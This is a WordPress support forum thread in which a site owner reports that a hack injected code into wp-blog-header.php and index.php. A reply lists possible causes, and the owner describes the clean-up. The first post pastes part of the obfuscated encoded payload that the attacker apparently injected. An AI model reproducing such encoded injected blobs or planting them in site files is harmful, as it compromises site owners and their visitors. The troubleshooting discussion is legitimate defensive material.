WordPress 3.04 hacked?

  • mrwonkish

    (@mrwonkish)


    15 years, 1 month ago

    All,

    On all wordpress files i find in the footer the following:

    When looking in the wp-blog-header.phh files i saw some added code which was not present on a site not showing the text below (i have deleted the content of the wp-blog-header file but the code below came after somethiong like decode64 ginflate …somthing like that)

    The lines keep poping up in the footer, even after removing the text/code from the wp-blog-header file.

    All sites have different plugins (some nearly have plugin, just very very basic, they also do not overlap)

    Any ideas?

    re(‘./wp-blog-header.php’); ?>2UWe/BnaEIcKf3pNJOwfxYTDfBZE/ugNDVgaWrVHU76ljISq8MQx47hWtWrkASDAPuOnDUgaVjqDsTdpZxuxb0RuS6pT8yKe9yu3B07Eda9LaTo5ZLdFRs0mdJ2GncLKPUCy2dSljyzil2hyXFLsIylSGJvTw+naMs8ra+A/G2vgeXPMCe8sB8Eo1M4rAAJbWtlpJFaunJatJVki0FbF7eVZz3x7GWZLuKpJ3bWG8cpe/bx7stCxsFUgnriYj2NsT/bRR8m3nw6qHwgrIwiz6X3hctvta/jvVUbLlXTkG1VV0ZqsbzbPVUvzkd8KCbL1mUmQcq3Ya+YdIsCL2iLy2loJwWWYM5qrf0ohisUrZddLf0xSi8dxR+0nvdVhWRBWhXWDKs9PVQMwkomjUxu/A+kzUqkOyXNYukmGalF0p0zRK6MoROZXJZVS1OpzLc7KJNywJx7GI6mhXNZol9yVx0mV0Uq1XWbvXpcKo9LfObAdFR/eaU49+s1ouiZpE77bw68xra235O+3nPzpbhtvUuc7xbvBr2dnCyNB40GQ578tv/iYfeeHL+rU1WR+GXjyCnOvSd6rTQK0VdraY149Xpk1vTv6MRtBO6LeMhpx4+Gaoze9d4yNvvEF+ePUtKD543UF7iy7bpU47hzouUbs6rZ+p7fd3veJQ2OmDzdfn3GnHvc/dcr7bOv+/lX8nX//5o7/9VibRkFvgCo1tEBmwpvrjLAMN3BrLx6QV+zVe+viyi+dRd3mvweehkRnnCziOBgW3oX5NB0nAx6MPAR8jgIdWbyK8TqUwcYjI4beUfI/8B”))); #/3a5346# ?>re(‘./wp-blog-header.php’); ?>

Viewing 2 replies - 1 through 2 (of 2 total)
  • Clayton James

    (@claytonjames)

    15 years, 1 month ago

    WordPress 3.04 hacked

    “All sites have different plugins”

    It can happen for many reasons. Shared servers with relaxed or inappropriate permissions are one. Compromised ftp credentials from sources such as malware infected work stations or PC’s is another possibility.

    Not keeping up with security updates and upgrades is another distinct possibility. You have missed some security related updates since 3.0.4. Third party items such as themes and other web applications located on your own domain can contribute. Untrusted sources are always suspect.

    Thread Starter mrwonkish

    (@mrwonkish)

    15 years, 1 month ago

    I have removed the code from my webpages. Also the 3.1.1 site had the same code.

    Avira detected it as follows:

    The file ‘C:\Users\xxxx\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12\3cc664c-253c7238’
    contained a virus or unwanted program ‘JAVA/Exdoer.BC.1’ [virus]
    Action(s) taken:

    I scanned the code offline –> no alerts. I removed the code from both index.php & wp-blog-header.php and set the permissions on 444 instead of on 644.

    I think one of the plugins on one of the sites was not OK. Hard to track down what exactly the entry was for this code injuction….

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘WordPress 3.04 hacked?’ is closed to new replies.